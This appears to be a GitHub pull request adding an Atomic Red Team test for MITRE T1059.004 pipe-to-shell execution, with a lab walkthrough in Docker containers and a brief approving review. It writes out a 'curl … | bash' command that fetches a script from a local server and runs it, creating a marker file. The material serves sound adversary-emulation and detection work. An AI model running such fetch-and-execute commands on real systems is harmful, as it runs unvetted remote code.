### PR TITLE
T1059.004 Added Detecting pipe-to-shell

### PR DESCRIPTION
**Pull request by biot-2131**
**Details:**
Added the Detecting pipe-to-shell test

**Testing:**
Tested in VM's and containers: Ubuntu 22.04, ubi8 and rhel 8.7

$ docker network create bridge_18
# Server
$ docker container run -it --rm --network bridge_18 -p 9090:9090 --name python310 python:3.10-bullseye bash
$ apt update && apt install -y nano iproute2
$ cd /tmp 
$ nano pipe-to-shell.sh # -> Cut&Paste
$ python3 -m http.server 9090
# Client
$ docker container run -it --rm --network bridge_18 --name ubuntu2204 ubuntu:22.04 bash
$ apt update && apt install -y curl
$ cd /tmp 
tmp# curl 172.18.0.2:9090/pipe-to-shell.sh
tmp# ls -la /tmp/art.txt
ls: cannot access '/tmp/art.txt': No such file or directory
tmp# curl 172.18.0.2:9090/pipe-to-shell.sh |bash
% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                Dload  Upload   Total   Spent    Left  Speed
100   365  100   365    0     0   214k      0 --:--:-- --:--:-- --:--:--  356k
Being piped
tmp# cat /tmp/art.txt
Atomic Red Team was here... T1059.004
T1059 004 Added Detecting pipe-to-shell

### CODE REVIEW

**Comment by josehelps** [comment]
@biot-2131 looks great, 404ed for me I think because the URL is not present yet since it is not merged in. With that said my only suggestion would be to please add a reference to where this attack might be documented. I understand its implementation but was left wondering about practical implementations seen in the wild. If you can attach any reference URL I think that would improve the description. 

Thank you again for the awesome contribution

image

**Review by josehelps — APPROVED** [review]
LGTM, My only minor suggestion is to add a reference in the description to where this might have been used in practice.

**Comment by biot-2131** [comment]
I don't know of any 'MITRE style' real-world uses of this technique; it's just a neat trick.

**Comment by biot-2131** [comment]
Whoops I forgot to @josehelps you, I have updated all three. Thanks

**Pull request merged**
